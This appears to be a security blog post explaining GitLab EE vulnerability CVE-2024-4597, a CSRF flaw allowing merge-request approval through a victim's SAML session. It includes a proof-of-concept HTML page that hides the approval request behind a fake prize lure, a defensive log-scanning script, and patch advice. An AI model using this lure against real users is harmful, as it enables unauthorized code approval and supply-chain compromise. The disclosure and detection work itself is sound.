GitLab is a widely used web-based platform for managing software development, built around Git for version control and collaboration. Recently, a security vulnerability (CVE-2024-4597) was disclosed that affects GitLab Enterprise Edition (EE) versions 16.7 to 16.9.7, 16.10 to 16.10.5, and 16.11 to 16.11.2. It allows an attacker to abuse a user's existing SAML session to approve a merge request (MR) through Cross-Site Request Forgery (CSRF).

In this post, we'll examine the exploit in detail, provide sample code that demonstrates the vulnerability, and point to original references for further study.

Exploit Details

The vulnerability exists due to insufficient CSRF protection in the SAML authentication process, specifically related to merge request approvals. An attacker can take advantage of a user's active SAML session to trick them into approving a malicious merge request.

To exploit this vulnerability, an attacker crafts an HTML page containing a form that submits a request to the GitLab instance to approve a merge request, and then delivers a link to that page to the victim via email, social engineering, or other means. A user with an active SAML session who visits the page and clicks the bait provided by the attacker triggers the approval.

Here's a code snippet demonstrating the exploit:

<!DOCTYPE html>
<html>
<head>
<title>GitLab CSRF Exploit</title>
</head>
<body>
  <h1>Congratulations! You won a prize!</h1>
  <p>Click the button below to claim your reward:</p>
  <!-- The three placeholders in the action URL are filled in by the attacker -->
  <form action="https://your-gitlab-instance.com/api/v4/projects/your-project-id/merge_requests/your-mr-id/approve" method="POST">
    <input type="submit" value="Claim your prize!" />
  </form>
</body>
</html>

your-gitlab-instance.com: The hostname of the targeted GitLab instance.
your-project-id: The ID of the project that contains the merge request.
your-mr-id: The ID of the merge request the attacker wants to have approved.

Now, any user with an active SAML session who visits this page and clicks the "Claim your prize!" button will inadvertently submit an approval request for the merge request specified in the form.
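From the defender's side, the tell-tale sign of this attack is a POST to the merge-request approve endpoint whose Origin or Referer is not the GitLab instance itself. The following is an added example, not code from the original post or from GitLab: it scans constructed access-log lines in a simple key=value format (an assumption; adapt the parser to your real log format) and flags such approvals for review.

```python
"""Flag merge-request approvals that look cross-site (CSRF-style).

Added example, not GitLab's own code. Log format is a constructed
key=value layout; only the approve path matches the one used above.
"""
import re
from urllib.parse import urlparse

# Approve endpoint as used in the form above: /api/v4/projects/<id>/merge_requests/<iid>/approve
APPROVE_RE = re.compile(r"^/api/v4/projects/[^/]+/merge_requests/\d+/approve/?$")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_line(line):
    """Parse a key=value log line; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def origin_host(rec):
    """Host from Origin, falling back to Referer; None when neither is present."""
    for key in ("origin", "referer"):
        val = rec.get(key, "-")
        if val and val != "-":
            return urlparse(val).hostname
    return None

def is_suspicious_approval(rec, gitlab_host):
    """True for a POST to the approve endpoint whose source is not gitlab_host.

    A missing Origin/Referer is flagged as well: browsers send Origin on
    cross-origin POSTs, and a referrer policy may strip Referer, so an
    absent source header on an approval is worth a look too.
    """
    if rec.get("method") != "POST" or not APPROVE_RE.match(rec.get("path", "")):
        return False
    return origin_host(rec) != gitlab_host

def find_suspicious_approvals(lines, gitlab_host):
    recs = [parse_line(line) for line in lines]
    return [r for r in recs if is_suspicious_approval(r, gitlab_host)]

# Constructed sample log lines (not real GitLab logs); hosts are placeholders.
SAMPLE_LOG = [
    'time=2024-05-14T15:44:10Z method=POST path=/api/v4/projects/42/merge_requests/7/approve referer="https://gitlab.example.com/group/proj/-/merge_requests/7" user=alice',
    'time=2024-05-14T15:45:02Z method=POST path=/api/v4/projects/42/merge_requests/7/approve referer="https://prize-claim.example.net/win.html" user=bob',
    'time=2024-05-14T15:46:30Z method=POST path=/api/v4/projects/42/merge_requests/7/approve referer=- user=carol',
    'time=2024-05-14T15:47:11Z method=GET path=/api/v4/projects/42/merge_requests/7 referer="https://prize-claim.example.net/" user=dave',
]

if __name__ == "__main__":
    for rec in find_suspicious_approvals(SAMPLE_LOG, "gitlab.example.com"):
        print(rec["user"], rec["path"], rec.get("referer"))
```

Detection of this kind is an interim control only; the actual fix is upgrading to a patched release.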

The official security release announcement can be found here:

GitLab Security Release: 16.9.7, 16.10.5, and 16.11.2

It is strongly recommended that all GitLab administrators immediately update to the appropriate (fixed) version to protect their systems from potential attacks.

Conclusion

In this post, we have discussed the recently disclosed GitLab EE vulnerability (CVE-2024-4597) and its impact. The issue allows an attacker to abuse a user's active SAML session to approve a merge request via CSRF. We provided an example of how the exploit works and outlined the recommended fixes and updates. Given the widespread use of GitLab for managing software projects, it is vital that administrators take action to ensure the security of their systems and users.

Timeline

Published on: 05/14/2024 15:44:10 UTC
Last modified on: 05/14/2024 16:11:39 UTC